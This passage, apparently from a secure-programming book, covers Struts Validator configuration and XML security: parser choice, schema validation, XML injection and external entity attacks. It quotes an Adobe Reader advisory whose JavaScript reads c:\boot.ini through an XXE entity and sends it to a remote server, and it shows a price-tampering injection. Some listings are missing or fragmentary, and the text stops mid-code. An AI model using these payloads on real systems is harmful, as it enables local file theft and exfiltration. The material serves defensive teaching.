• An Action class defines an execute() method that is responsible for carrying out the purpose of the request. It usually takes data out of an ActionForm object and uses that data to invoke the appropriate business logic.
• An action mapping is a configuration file entry that associates a form bean, an action, and a path. When Struts sees a request, it uses the requested URL to choose the appropriate action mapping, and then populates the form bean specified by the action mapping and uses it to invoke the Action class specified by the action mapping.
• A validator form is a configuration file entry that specifies the checks that should be performed before an ActionForm is populated from an HTTP request.

The Struts Validator is a necessary part of an input validation strategy, but it is not sufficient by itself. Because Struts validation is performed just after the data arrive at the server, there is usually not enough application context to perfectly differentiate valid input from invalid input. The application must include additional validation in the context of its business logic. The Validator is useful for checking GET and POST parameter values, but it does not provide a way to check cookies and other HTTP headers. You must use a different strategy for validation of names and values coming from cookies and other HTTP headers. The Validator can be used for client-side validation, too, but client-side validation does not change the need to validate all input on the server.

Setting Up the Struts Validator

Creating a central framework for input validation is no small task. If your application uses Struts, the Struts Validator is probably the easiest and fastest way to start doing centralized input validation. You should aim for using Struts to consistently validate all form data received from the client. In the Struts configuration file, a typical setup for the Validator looks like this:

[Configuration listing not preserved.]

The configuration file validator-rules.xml contains the definitions of validation functions, called validators. The configuration file validation.xml defines which validators are used for each form and each form field.
Older Struts applications might rely on the ActionForm.validate() method to perform input validation. Although it is appropriate to use the validate() method to do specialized and complex types of validation, no matter what the case, all input fields should be validated for basic properties using the Struts Validator.

Use the Struts Validator for All Actions

By using the Struts Validator, you can ensure that every form request the program accepts is validated. You should use the Struts Validator to perform server-side sanity checks for every Struts Action that accepts parameters. Although it is possible to create a custom input validation system that is just as comprehensive as the Struts Validator, it is difficult to do so correctly and completely. Unless there is some way to mechanically verify that all input fields are being validated, the probability is high that some fields will be overlooked. Do not accept another approach to validation in place of the Struts Validator unless there is an automated way to verify that the replacement framework validates every field on every input form. Consider the need to verify the correctness and completeness of an application’s input validation strategy both at the present time and in the future as the application is maintained and enhanced.

Examples 9.14 and 9.15 show how a validation form can be used to sanity-check the input to a simple ActionForm. In this example, the form accepts only one parameter, named passwd. The form com.bonsecure.action.LoginAction is bound to a URL path through a form bean and an action mapping, as shown in Example 9.14. Then, in Example 9.15, the validation logic checks that the passwd parameter for PasswdForm is between 6 and 12 characters long, and that it contains only alphanumeric characters.

Example 9.14 Entries in struts-config.xml define a form bean and an action mapping.
Together these entries establish the URL path for the action and the form that the action accepts.

[XML listing not preserved.]

Example 9.15 This entry in validation.xml defines the validation criteria for the form bean: The passwd parameter must be between 6 and 12 characters long, and it must contain only alphanumeric characters.
[XML listing not preserved. Surviving rule values: min 6, max 12, mask ^[0-9a-zA-Z]+$]
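As a rough illustration of what these three rules enforce, the following plain-Java sketch applies the same checks by hand. It is not the Struts Validator API: the class and method names (PasswdRules, isValid) are hypothetical, and only the limits (6 and 12) and the mask are taken from the example.

```java
import java.util.regex.Pattern;

// Hypothetical helper, not part of Struts: mirrors the minimum length,
// maximum length, and mask rules described for the passwd field.
class PasswdRules {
    private static final int MIN = 6;
    private static final int MAX = 12;
    // Whitelist of known-good characters, same mask as in the example.
    private static final Pattern MASK = Pattern.compile("^[0-9a-zA-Z]+$");

    static boolean isValid(String passwd) {
        if (passwd == null) {
            return false;
        }
        if (passwd.length() < MIN || passwd.length() > MAX) {
            return false;
        }
        // matches() requires the whole string to fit the mask.
        return MASK.matcher(passwd).matches();
    }

    public static void main(String[] args) {
        System.out.println(isValid("abc123")); // six alphanumerics
        System.out.println(isValid("abc12!")); // right length, bad character
    }
}
```

Expressing the checks declaratively in validation.xml has the advantage that a tool can confirm every field has them; hand-written checks like this one are harder to audit mechanically.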
Notice that the input field is validated against a minimum and maximum length, and that the contents are checked against a whitelist of known-good characters.

Validating input to all ActionForm objects requires both the code and the configuration to be right. On the configuration side, every form bean used by an ActionForm must have a validation form defined for it. (Whew, that’s a mouthful.) Furthermore, the ActionForm mapping must not disable validation. Disabling validation disables the Struts Validator, as well as any custom validation logic defined by the form. Example 9.16 shows an action form mapping that disables validation.

Example 9.16 Don’t do this at home: Setting the validate flag to false disables the Struts Validator.

[XML listing not preserved.]

Validation is enabled by default, so you do not need to explicitly set the validate property, as shown in Example 9.17.

Example 9.17 The validate flag defaults to true, so you do not need to specify a value for it.

[XML listing not preserved.]

Turning to the code, an ActionForm must extend one of the following classes:

• ValidatorForm
• ValidatorActionForm
• DynaValidatorActionForm
• DynaValidatorForm

Extending one of these classes is essential because the Validator works by implementing the validate() method in these classes. Forms derived from the following classes cannot use the Struts Validator:

• ActionForm
• DynaActionForm

There’s one more way to break the Validator: If an ActionForm class defines a custom validate() method, that method must call super.validate(), which might look something like the code in Example 9.18. Does this sound like a lot to keep track of? That’s what static analysis is good at.

Example 9.18 If an ActionForm implements the validate() method, it must call super.validate().

    public abstract class MyForm extends ValidatorForm {
      ...
      public ActionErrors validate(ActionMapping mapping,
                                   HttpServletRequest request) {
        // run the Struts Validator checks first and keep their result
        ActionErrors errors = super.validate(mapping, request);
        this.errors = errors;
        // then apply the form's own specialized checks
        doSpecialValidation(mapping, request);
        return errors;
      }
    }

Validate Every Parameter

Some applications use the same ActionForm class for more than one purpose. In situations like this, some fields might go unused under some action mappings. It is critical that unused fields be validated even if they are not supposed to be submitted. You should validate every parameter accepted by an ActionForm, including those that are not used by the current Action. Preferably, unused fields should be constrained so that they can be only empty or undefined. If unused fields are not validated, shared business logic in an Action could allow attackers to bypass the validation checks performed for other uses of the form bean.

For every bean parameter that an ActionForm class declares, the validator form must have a matching entry. This means cross-checking the configuration against the code. If the ActionForm class declares this method

    void setPasswd(String s) { passwd = s; }

then the validator form should contain a line that looks something like this:

[XML listing not preserved.]

We recently looked at an application that allowed users to edit their own user profile. Of course, administrators could edit user profiles, too, with an additional capability: When an administrator edited a user profile, he or she got an additional checkbox that controlled whether to grant administrator privileges to the user. Not surprisingly, the developers had used the same Action and ActionForm for both regular users and for administrators. All a regular user needed to do to become an administrator was add an extra parameter to the profile update request. This is exactly the sort of mistake that could have been prevented with the Struts Validator. Of course, you could also add back-end logic that would check to make sure that only administrators could muck with the administrator bit.
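A back-end check of that kind might look something like the sketch below. It is illustrative only: ProfileService, User, updateProfile, and the parameter names "admin" and "email" are all hypothetical and do not come from Struts or from the application described.

```java
import java.util.Map;

// Hypothetical back-end check; none of these names come from Struts.
class ProfileService {
    static class User {
        final String name;
        boolean admin;
        String email;

        User(String name, boolean admin) {
            this.name = name;
            this.admin = admin;
        }
    }

    // Applies a profile update on behalf of 'actor'. The "admin" field is
    // honored only when the actor is already an administrator.
    static void updateProfile(User actor, User target, Map<String, String> params) {
        if (params.containsKey("admin") && !actor.admin) {
            throw new SecurityException("only administrators may change the admin flag");
        }
        if (!actor.admin && actor != target) {
            throw new SecurityException("users may edit only their own profile");
        }
        // All checks passed; only now is the target modified.
        if (params.containsKey("email")) {
            target.email = params.get("email");
        }
        if (params.containsKey("admin")) {
            target.admin = Boolean.parseBoolean(params.get("admin"));
        }
    }
}
```

The checks run before any field is written, so a rejected request leaves the profile untouched.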
So which is the right answer? Both! Struts is an excellent first part of a belt-and-suspenders approach to input validation. Use the Validator to make sure that requests look the way you expect them to, but also perform sanity checking on the back end to make sure the actions the system is performing make sense.

Maintain the Validation Logic

Do not leave extraneous ActionForm objects, validation forms, or form fields in your configuration; keep Struts validation logic in sync with the application as it evolves. As bugs are fixed and new features are added, the validation logic will need to be maintained in sync with the rest of the application. One of the downsides to validation with Struts is that it is easy for developers to forget to update validation logic when they make changes to an ActionForm class. One indication that validation logic is not being properly maintained is inconsistencies between the ActionForm and the validation form.

Consider the ActionForm in Example 9.19. It defines two fields, startDate and endDate. Now look at a validation form in Example 9.20. It contains the original logic to validate DateRangeForm. The validation form lists a third field: scale. The presence of the third field suggests that DateRangeForm was modified without taking validation into account.

Example 9.19 DateRangeForm is a ValidatorForm that defines two fields: startDate and endDate.

    public class DateRangeForm extends ValidatorForm {
      String startDate, endDate;

      public void setStartDate(String startDate) {
        this.startDate = startDate;
      }

      public void setEndDate(String endDate) {
        this.endDate = endDate;
      }
    }

Example 9.20 This validation form originally was intended to validate DateRangeForm.
[XML listing not preserved.]

This error usually indicates that a developer has done one of three things:

• Removed a field from an ActionForm class and failed to update the validation logic
• Renamed a field in an ActionForm class and failed to update the validation logic
• Made a typographic error either in the name of the validation field or in the ActionForm member name

We’ve also come across multiple validation forms with the same name, as shown in Example 9.21, making it somewhere between difficult and impossible to determine how the given form bean will actually be validated.

Example 9.21 The Struts Validator allows multiple validation forms to have the same name, but giving two validation forms the same name makes it hard to determine which validation form will be applied.
[XML listing not preserved.]

Our primary worry here is that the developer has either made a typo or allowed the validation logic to get out of sync with the code. Small errors such as this one could be the tip of the iceberg; more subtle validation errors might have crept into the application at the same time. Check to ensure that lengths and field values are still correct.

There are also mistakes that are entirely confined to the configuration: If a validation form does not reference any existing form bean mapping, chances are good that the developer either failed to remove an outmoded validation form or, more likely, failed to rename the validation form when the name of the form bean mapping changed. Name changes often accompany functionality changes, so if you determine that the names are out of sync, check to see if the validation checks are out of sync, too.

Finally, we’ve seen cases in which two validation forms have the same name. This causes the Struts Validator to arbitrarily choose one of the forms to use for input validation and discard the other. There is no guarantee that this decision will correspond to the programmer’s expectations.

Static Analysis: The Struts Validator

The Struts Validator offers a powerful framework for input validation, but its configuration files can be confusing and hard to keep in sync with the code. Static analysis can help by cross-checking the configuration files with the code. Some of the things you can check include the following:

• The validation framework is in use.

  Configuration rule:
    File Pattern: struts-config.xml
    XPath Expression: /struts-config/plug-in[@className = 'org.apache.struts.validator.ValidatorPlugIn']

• Validation has not been disabled for any forms. Validation is disabled by setting the validate attribute to false on the action mapping in the Struts configuration file.
  Configuration rule:
    File Pattern: struts-config.xml
    XPath Expression: /struts-config/action-mappings/action[@validate = 'false']

• Custom validation logic does not disable the Validator. (The Validator is disabled when a validate() method does not call super.validate().)

  Structural rule:
    Function: name == "validate" and
      enclosingClass.supers contains
        [name == "org.apache.struts.validator.ValidatorForm"] and
      not (callees contains
        [Function: reaches [Function: name == "validate" and
          enclosingClass.supers contains
            [name == "org.apache.struts.validator.ValidatorForm"]
        ]]
      )

Summary

Writing a secure Web application is tricky business. You cannot trust any of the data received as part of an HTTP request. Attackers will alter form fields and HTTP headers regardless of any client-side constraints. They will also study the way the client and server components of the application interact, so there is no way to keep a secret in a Web client.

The application is responsible for protecting its users from malicious content. Attackers might try to take advantage of cross-site scripting, HTTP response splitting, or open redirects to use the application to transmit attacks to other users. To prevent such attacks, applications should perform output validation in addition to input validation.

The HTTP protocol creates opportunities for security problems. For any requests that carry sensitive data, prefer the HTTP POST method to the HTTP GET method because the parameters to a GET request will be liberally cached and stored in log files. But note that both methods send data in the clear, so use cryptography to protect sensitive information. Do not rely on requests arriving in the order you expect; if a different order would benefit attackers, that is the order they will use. To prevent cross-site request forgery, create your own mechanism for determining the provenance of the requests the application receives.
If an attacker can learn a user’s session identifier, the attacker can gain control of the user’s session. Make sure that the session identifiers you use are long enough and random enough that attackers cannot guess them. To prevent an attacker from forcing a session identifier on a user, issue a new session identifier as part of the authentication process. Enforce a session idle timeout and a maximum session lifetime.

The Struts Validator is an example of an input validation framework that can be used to enforce security constraints on HTTP requests. Interaction among the various components of the Struts framework and the Struts Validator can be confusing, and the confusion can lead to holes in the validation logic. Use static analysis to ensure that all forms and all input fields are constrained by validation checks.

10 XML and Web Services

We must all hang together, or most assuredly we will all hang separately.
Benjamin Franklin

Extensible Markup Language (XML), Web Services, and Service Oriented Architectures are the latest craze in the software development world. Sometimes the latest craze sticks around for a while; previous waves have brought us optimizing compilers, object-oriented programming, and the graphical user interface. Not every wave makes it, of course. These days we don’t talk much about bubble memory or the gopher protocol.

XML defines a simple and flexible syntax. It is, at least in theory, human readable and therefore easier to debug than a binary format. Web Services define a standard means by which XML can be used for communication between applications, essentially providing all the necessary ingredients for a platform-neutral Remote Procedure Call (RPC).
Service Oriented Architecture (SOA) refers to a style of design in which interactions between components are made explicit and components are freed of unnecessary interdependencies by using standardized interfaces and communication mechanisms such as Web Services.

This trio promises to remedy one of the great and ongoing disappointments in software: lack of reuse. The collective opinion of software developers is that it should be quick and easy to create new applications from large chunks of interoperable code. Similarly, it should be a simple matter to fuse together two data sources on opposite ends of the network and put them behind a single interface.

Whether or not we are on the verge of a new era in software reuse, the goal alone is enough to make some security folks cringe. Aside from the fact that security tends to bring with it the glass-half-empty perspective, reducing the amount of time necessary to reuse large bodies of code or entire network services might also reduce the amount of time given to considering security ramifications of said combinations. It might be easy to glue together System A and System B, but will the combination be secure? Will anyone even stop to ask if the system is secure?

This chapter is organized as the title suggests:

• Working with XML: Web Services frameworks such as the Apache Axis Project abstract away many of the details of the actual XML exchange from the client application, but even with such a framework in place, it seems that most developers end up manipulating XML directly at some point. For that reason, we begin by looking at issues related to handling XML.
• Using Web Services: With the XML discussion in mind, we move on to issues specifically related to Web Services.
One of the most visible offshoots of the Web Services concept is Asynchronous JavaScript and XML (Ajax), so we will also use this section to examine a security concern specifically related to Ajax: JavaScript hijacking.

10.1 Working with XML

XML looks easy; it’s appealing the same way HTML is appealing. But watch out: XML is one more input validation and representation trap. For starters, XML is harder to parse than it might first appear. Deeply nested tags, entities, and external references can all cause trouble. Then there’s document validation; there are multiple ways to define a document syntax and then validate documents against that syntax, but most parsers default to doing nothing beyond the most primitive validation. When it’s time to pull data out of an XML document, what data-retrieval mechanism would be complete without the potential for injection attacks? Query languages such as XPath can make it easy to process XML, but they can also lead to problems.

Use a Standards-Compliant XML Parser

Avoid the temptation to roll your own XML parser. The following chunk of XML looks simple enough:

[XML listing not preserved. Surviving text content: sue, northwest]

It is so simple, in fact, that it might be tempting to pull out names and groups with a regular expression or some other short and sweet piece of one-off code. Resist this temptation. XML looks simple, but the rules for parsing it properly are complicated. To get a feeling for the complexity of parsing XML, consider that Version 2.8.0 of the Apache Xerces-J parser is roughly 178,000 lines of code.

A naïve approach to parsing XML can make denial-of-service attacks easy. Although the XML you expect to receive might be straightforward, an attacker could provide you with more than you bargained for. Even if the input you receive contains balanced tags and is otherwise a valid XML document, you might end up processing an extraordinarily large amount of data, or you might get a particularly deep or unusual arrangement of nodes.
The following bit of XML shows both deep nesting of name nodes and the strange appearance of a member node inside a group element.

[XML listing not preserved. Surviving text content: sue]

A home-brew parser is more likely to use an excessive amount of memory or run into other unexpected performance bottlenecks when faced with documents that have an unusual shape. At one point, these were significant problems for many widely used parsers, too, but since their inception, XML parsers such as Xerces have come a long way in terms of performance, reliability, and capability to cope with oddly shaped documents.

XML entities are another major source of problems. Entities are special name-value pairs that behave much like macros. They begin with an ampersand and end with a semicolon. Commonly used entities include &lt; for “less than” and &nbsp; for “nonbreaking space.” XML allows a document to define its own set of entities.

Entities can kill your front end with recursion. A naïve parser can loop forever trying to expand a recursively defined entity. Even more problematic is the fact that entities make it possible to say the same thing in many different ways. This makes it approximately impossible to create an input filter based on blacklisting. It also greatly increases the chance that two different parsers will have slightly different interpretations of the same document.

Home-grown parsers can also make mistaken assumptions about characters that might or might not appear in an XML document, such as overlooking the fact that parsing rules are very different inside a CDATA section (where just about any character is legal). This could enable metacharacter attacks against the parser.

The answer to the parsing problem: don’t underestimate the parsing problem. You’ll almost always want to reuse an existing parser that has a good track record for standards compliance and for security. We like Xerces. It’s had some security problems, but it appears to have improved as a result.
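To make the advice concrete, here is a minimal sketch of reading the small member document with the standard JAXP parser instead of a regular expression. Several things are assumptions rather than details from the text: the document shape (a member root with one name and one group child), the class name MemberReader, and the choice to reject any document that carries a DOCTYPE. The disallow-doctype-decl feature identifier comes from Xerces and is honored by the parser bundled with common JDKs; a different parser might not support it.

```java
import java.io.StringReader;
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Element;
import org.w3c.dom.Node;
import org.xml.sax.InputSource;

// Hypothetical reader for <member><name>..</name><group>..</group></member>.
class MemberReader {
    // Returns {name, group}; throws IllegalArgumentException on any
    // malformed, oddly shaped, or DOCTYPE-bearing document.
    static String[] readMember(String xml) {
        try {
            DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
            // Ask the parser to apply its built-in resource limits.
            factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
            // Assumption: no legitimate member document defines entities,
            // so a DOCTYPE is refused outright (Xerces-derived feature).
            factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
            DocumentBuilder builder = factory.newDocumentBuilder();
            Element root = builder.parse(new InputSource(new StringReader(xml)))
                                  .getDocumentElement();
            if (!"member".equals(root.getNodeName())) {
                throw new IllegalArgumentException("expected <member> root");
            }
            return new String[] { leafText(root, "name"), leafText(root, "group") };
        } catch (IllegalArgumentException e) {
            throw e;
        } catch (Exception e) {
            throw new IllegalArgumentException("rejected XML document", e);
        }
    }

    // Finds exactly one direct child element called 'tag' that has no
    // nested elements, and returns its text.
    private static String leafText(Element parent, String tag) {
        String found = null;
        for (Node n = parent.getFirstChild(); n != null; n = n.getNextSibling()) {
            if (n.getNodeType() != Node.ELEMENT_NODE || !tag.equals(n.getNodeName())) {
                continue;
            }
            if (found != null) {
                throw new IllegalArgumentException("duplicate <" + tag + ">");
            }
            for (Node c = n.getFirstChild(); c != null; c = c.getNextSibling()) {
                if (c.getNodeType() == Node.ELEMENT_NODE) {
                    throw new IllegalArgumentException("nested element inside <" + tag + ">");
                }
            }
            found = n.getTextContent().trim();
        }
        if (found == null) {
            throw new IllegalArgumentException("missing <" + tag + ">");
        }
        return found;
    }
}
```

The shape checks in leafText are a hand-written stand-in for what a schema would express; they are included only so the sketch rejects the deeply nested case on its own.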
Turn on Validation

Validating against an XML schema (or even a DTD) is a good way to limit an attacker’s options. XML was born to be validated. Because the format is so flexible and open-ended, it begs for an equally flexible way to specify the proper format for a class of documents. That specification originally took the form of a Document Type Definition (DTD), but these days, data-exchange applications more commonly use XML Schema, partly because the Simple Object Access Protocol (SOAP) uses XML Schema and SOAP is the basis for many Web Services standards. XML Schema is a better choice from a security perspective too. If you’d like to take a different path entirely, you might also consider the RELAX NG schema language.

Validation isn’t necessary to parse XML, but skipping the validation step gives an attacker increased opportunity to supply malicious input. Because many successful attacks begin with a violation of the programmer’s assumptions, it is unwise to accept an XML document without validating it.

But just because a document is valid XML doesn’t mean it’s tame. Consider the following scenario: The objective is to build an order-processing system that accepts orders that look like this:

[XML listing not preserved. Surviving text content: Magic tricks for all ages 110.95 P. O. Box 510260 St. Louis, MO 63151-0260 USA]

For such a simple XML document, it doesn’t take more than a few dozen lines of code to extract the data we need. The OrderXMLHandler class in Example 10.1 does just that. The characters() method holds on to each bit of text it sees. The endElement() method stores the text away in the proper variable, depending on the name of the end tag it is processing. When the order is complete (signified by the closing order tag), the endElement method sends off the order data to be processed. The main() method treats each command-line argument as the name of an XML file to be read.
Example 10.1 The OrderXMLHandler class doesn’t validate the documents it reads, leaving it vulnerable to maliciously crafted XML.

    import java.io.*;
    import org.xml.sax.*;
    import org.xml.sax.helpers.DefaultHandler;
    import javax.xml.parsers.*;

    public class OrderXMLHandler extends DefaultHandler {

      public static void main(String[] args) throws Exception {
        OrderXMLHandler oxh = new OrderXMLHandler();
        SAXParserFactory factory = SAXParserFactory.newInstance();
        SAXParser parser = factory.newSAXParser();
        for (int i=0; i < args.length; i++) {
          parser.reset();
          parser.parse(new File(args[i]), oxh);
        }
      }

      // text collected since the last end tag
      private StringBuffer currentCharacters = new StringBuffer();
      private String title;
      private String price;
      private String shipTo;

      public void endElement(String namespaceURI, String simpleName,
                             String qualifiedName) throws SAXException {
        if ("title".equals(qualifiedName)) {
          title = currentCharacters.toString();
        } else if ("price".equals(qualifiedName)) {
          price = currentCharacters.toString();
        } else if ("shipTo".equals(qualifiedName)) {
          shipTo = currentCharacters.toString();
        } else if ("order".equals(qualifiedName)) {
          processOrder(title, price, shipTo);
        }
        currentCharacters.setLength(0);
      }

      public void characters(char buf[], int offset, int len)
          throws SAXException {
        currentCharacters.append(new String(buf, offset, len));
      }

      private void processOrder(String title, String price,
                                String shipTo) {
        ...
      }
    }

OrderXMLHandler will process the expected input just fine, but unexpected input is a different matter. When it processes the following order XML, the price of the book drops from almost $20 to just a nickel.

[XML listing not preserved. Surviving text content: Magic tricks for all ages 110.95 0.05 P. O. Box 510260 St. Louis, MO 63151-0260 USA]

The shipTo element is not supposed to contain a price element embedded within it, but when it does, OrderXMLHandler gets confused and uses the last price it sees.
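The effect can be reproduced with a small self-contained sketch that keeps only the price-handling logic of the handler and parses from in-memory strings. The class name LastPriceWins, the helper priceOf, and the two sample documents (including the 19.95 and 0.05 values) are made up for the demonstration; only the element names come from the example.

```java
import java.io.StringReader;
import javax.xml.parsers.SAXParser;
import javax.xml.parsers.SAXParserFactory;
import org.xml.sax.InputSource;
import org.xml.sax.helpers.DefaultHandler;

// Hypothetical cut-down handler: records whatever text precedes each
// closing price tag, exactly as an unvalidated handler would.
class LastPriceWins extends DefaultHandler {
    private final StringBuilder text = new StringBuilder();
    String price;

    @Override
    public void endElement(String uri, String localName, String qName) {
        if ("price".equals(qName)) {
            price = text.toString().trim(); // a later price overwrites an earlier one
        }
        text.setLength(0);
    }

    @Override
    public void characters(char[] buf, int offset, int len) {
        text.append(buf, offset, len);
    }

    // Parses the document and returns the price the handler ended up with.
    static String priceOf(String xml) {
        try {
            LastPriceWins handler = new LastPriceWins();
            SAXParser parser = SAXParserFactory.newInstance().newSAXParser();
            parser.parse(new InputSource(new StringReader(xml)), handler);
            return handler.price;
        } catch (Exception e) {
            throw new IllegalArgumentException("could not parse order", e);
        }
    }

    public static void main(String[] args) {
        String honest = "<order><title>T</title><price>19.95</price>"
                      + "<shipTo>PO Box 1</shipTo></order>";
        String injected = "<order><title>T</title><price>19.95</price>"
                        + "<shipTo><price>0.05</price>PO Box 1</shipTo></order>";
        System.out.println(priceOf(honest));
        System.out.println(priceOf(injected));
    }
}
```

Both documents are well-formed, so the parser raises no error; the only difference is which price element the handler sees last.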
This vulnerability sometimes goes by the name XML injection because, presumably, the attacker has tricked some front-end system into generating an order document without validating the shipping address, thereby allowing the attacker to inject an unexpected XML tag.

It is not reasonable to expect an XML parser to validate the complete semantics of a document’s content. However, a parser can do a complete and thorough job of checking the document’s structure and, therefore, guarantee to the code that processes the document that the content is at least well-formed. A schema definition allows the XML parser to be much more specific about the data types that are allowed to inhabit each tag in the document. Validating the XML you receive is not the end of the input validation job, but it is a very good way to start.

The simplest way to ensure that the order document has the form we expect is to validate it against a DTD. The following DTD requires that an order element contain a title, a price, and a shipTo element, and that all those elements are leaf nodes.

[DTD listing not preserved.]

You can express the same thing in XML Schema as follows:

[XML Schema listing not preserved.]

Because XML Schema is currently the more popular choice, we modify OrderXMLHandler to validate against the XML Schema. (Unlike most of the examples in this book, the following code relies on interfaces introduced in Java 1.5.) This schema requires that all the tags are present and in the right order, but as long as the title, price, and shipTo elements don’t have any nested tags, it will accept any values for them. After we show how to modify the OrderXMLHandler class to validate against this schema, we come back and tighten up the schema to add stronger validation.

To enforce that the order XML matches the schema, two things need to change. First, the OrderXMLHandler class needs to enable validation. Second, it needs to stop processing if validation fails.
The main() method enables validation by creating a Schema object and registering it with the parser factory. Example 10.2 shows a new main() method for OrderXMLHandler that enables validation. The easiest way to cause processing to fail when validation fails is to override the error method, also shown in Example 10.2. Changes to the original OrderXMLHandler class are in bold.

Example 10.2 Changes to the OrderXMLHandler class to enable validation using XML Schema.

    public static void main(String[] args) throws Exception {
      // create schema object
      String language = XMLConstants.W3C_XML_SCHEMA_NS_URI;
      SchemaFactory sfactory = SchemaFactory.newInstance(language);
      StreamSource ss = new StreamSource(new File(ORDER_XSD_FILENAME));
      Schema schema = sfactory.newSchema(ss);

      // the handler must be an OrderXMLHandler so that its error() override is used
      OrderXMLHandler oxh = new OrderXMLHandler();
      SAXParserFactory factory = SAXParserFactory.newInstance();
      factory.setSchema(schema);
      SAXParser parser = factory.newSAXParser();
      for (int i=0; i < args.length; i++) {
        parser.reset();
        parser.parse(new File(args[i]), oxh);
      }
    }

    // treat every validation error as fatal
    public void error(SAXParseException e) throws SAXException {
      throw e;
    }

With these changes, OrderXMLHandler no longer trusts that the XML is well-formed. If the XML does not match the schema, the order won’t be processed. If enabling validation causes problems because the rules for defining a well-formed document are byzantine or altogether unknown, chances are good that there are also some security problems nearby. If you ask “Why don’t we do validation?” and the answer you get back is “We didn’t write down the schema when we created the format,” then reverse-engineer the schema from a few existing documents.

The revised schema in Example 10.3 demonstrates some of the more powerful validation features available with XML Schema. The contents of the price tag are now required to form a decimal number.
Both the title and shipTo tags are allowed to contain strings, but the contents must match against a regular expression that limits their possible values.

Example 10.3 A more rigorous XML schema for book order documents.

Be Cautious About External References

Consider an attacker’s ability to control processing or otherwise benefit from inserting external references. Returning for a moment to the world of DTDs, a document type declaration typically looks something like this:

The last portion of the declaration, the part that reads TR/xhtml1/DTD/strict.dtd, is called the system identifier. It is a URI that both names the DTD and provides a location where the DTD can be found.

So how should XML documents be validated? If you can be absolutely 100% certain that every XML document you receive will be generated by someone you trust, upon receiving an XML document you might just go retrieve the DTD pointed to by the system identifier. But because the DTD defines the rules for what makes up a well-formed document, you’ve turned over input validation to the attacker; the fox has been appointed director of henhouse security.1 You’ve also given an attacker an easy way to track the path that the document takes. Every time a new system receives the document, the attacker receives a new request for the DTD.

1. If retrieving the DTD requires accessing the network, you might also be relying upon DNS to retrieve the real DTD, which could leave you vulnerable to a DNS cache poisoning attack.

The moral to the story is a broad one: Do not trust external references that arrive cloaked in XML. The system identifier is not the only place external references can appear. The following document shows two entity declarations. The first references a URI, and the second references the filesystem.

    ]> ... &signature; &signature2;

Importing the contents of an arbitrary URI not only allows the attacker to monitor who is looking at the document and when, but it allows the attacker to change the parsed contents of the document as desired. Referencing the filesystem could allow an attacker to gain information from files that would otherwise be inaccessible. In both cases, this style of foul play is called an XML external entity (XXE) attack [Steuck, 2002].

An External Entity Vulnerability in Adobe Reader

In June 2005, Sverre H. Huseby found that Adobe Reader made its users vulnerable to an external entity attack [Huseby, 2005]. Huseby writes:

It appears that the XML parser in Adobe Reader can be tricked into reading certain types of local files, and pass them off to other sites. At least it worked with my Adobe Reader 7.0.1 running on Windows XP SP2, and my Adobe Reader 7.0 running on Debian GNU/Linux. A friend of mine confirms that it also works on Mac OSX running Adobe Reader 7.0.

Recent versions of Adobe Reader allow inclusion of JavaScript. From those JavaScripts, one may work with XML documents. XML documents may reference External Entities through URIs, and most XML parsers, including the one used in Adobe Reader, will allow access to any URI for External Entities, including files, unless told to do otherwise. To my knowledge, the general “XML External Entity Attack” was first described by Gregory Steuck in a post to Bugtraq in 2002.

The following example XML document will make an XML parser read c:\boot.ini and expand it into the content of the foo tag:

    ]> &xxe;

Note how the ENTITY definition creates the xxe entity, and how this entity is referenced in the final line. The textual content of the foo tag will be the content of c:\boot.ini, and a JavaScript accessing the DOM will be able to extract it.
Note: The attack is limited to files containing text that the XML parser will allow at the place the External Entity is referenced. Files containing non-printable characters, and files with randomly located less than signs or ampersands, will not be includable. This restriction greatly limits the number of possible target files.

The following Adobe Reader-targeted JavaScript contains the above XML, instructs the Adobe Reader XML parser to parse it, and passes the expanded External Entity (i.e., the content of c:\boot.ini) to a remote web server using the system web browser:

    var xml=" " + " ]>&xxe;";
    var xdoc = XMLData.parse(xml, false);
    app.launchURL("" + "head=Your+boot.ini&text=" + escape(;

The remote web server URL points to a script that just displays whatever is sent to it. (Please realize that even if the content of c:\boot.ini is displayed in the local web browser, it has taken a trip to the remote web server before being displayed locally.) With my setup, the web page included the following:

    [boot loader]
    timeout=30
    default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
    [operating systems]
    multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /fastdetect /NoExecute=OptIn

One can clearly see that the web server got a copy of c:\boot.ini from the local computer.

If you want to test, download the PDF file containing the script (created using Scribus), and move the mouse into the empty text field. The script is triggered when the mouse pointer enters the field. A similar PDF fetching the file /etc/passwd is also available, for testing on Unix-like systems.

As stated above, the XML parser is rather picky when it comes to the contents of the included file. But it has no problems if the file contains XML, which an increasing number of files appear to do these days.
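A parser that has been "told to do otherwise" can be sketched in a few lines of Java. This is an illustration under stated assumptions, not code from the book: NoDoctypeParser, newHardenedParser(), and accepts() are hypothetical names, and the feature URIs are the Xerces-style settings that the JDK's bundled parser is assumed to recognize. A different JAXP implementation might reject them, in which case setFeature() throws.

```java
import java.io.StringReader;
import javax.xml.XMLConstants;
import javax.xml.parsers.SAXParser;
import javax.xml.parsers.SAXParserFactory;
import org.xml.sax.InputSource;
import org.xml.sax.SAXException;
import org.xml.sax.helpers.DefaultHandler;

// Hypothetical helper: a SAX parser that refuses documents carrying a DOCTYPE,
// so no internal or external entity declarations are ever processed.
public class NoDoctypeParser {

    static SAXParser newHardenedParser() throws Exception {
        SAXParserFactory factory = SAXParserFactory.newInstance();
        factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        // Assumed to be supported by the parser in use (Xerces-derived parsers are).
        factory.setFeature(
            "http://apache.org/xml/features/disallow-doctype-decl", true);
        factory.setFeature(
            "http://xml.org/sax/features/external-general-entities", false);
        factory.setFeature(
            "http://xml.org/sax/features/external-parameter-entities", false);
        return factory.newSAXParser();
    }

    // Returns true if the document parses, false if the parser rejects it.
    static boolean accepts(String xml) throws Exception {
        try {
            newHardenedParser().parse(
                new InputSource(new StringReader(xml)), new DefaultHandler());
            return true;
        } catch (SAXException e) {
            return false;
        }
    }

    public static void main(String[] args) throws Exception {
        // The entity target below is a placeholder path, never actually read.
        String hostile = "<?xml version=\"1.0\"?>"
            + "<!DOCTYPE foo [<!ENTITY xxe SYSTEM \"file:///nonexistent\">]>"
            + "<foo>&xxe;</foo>";
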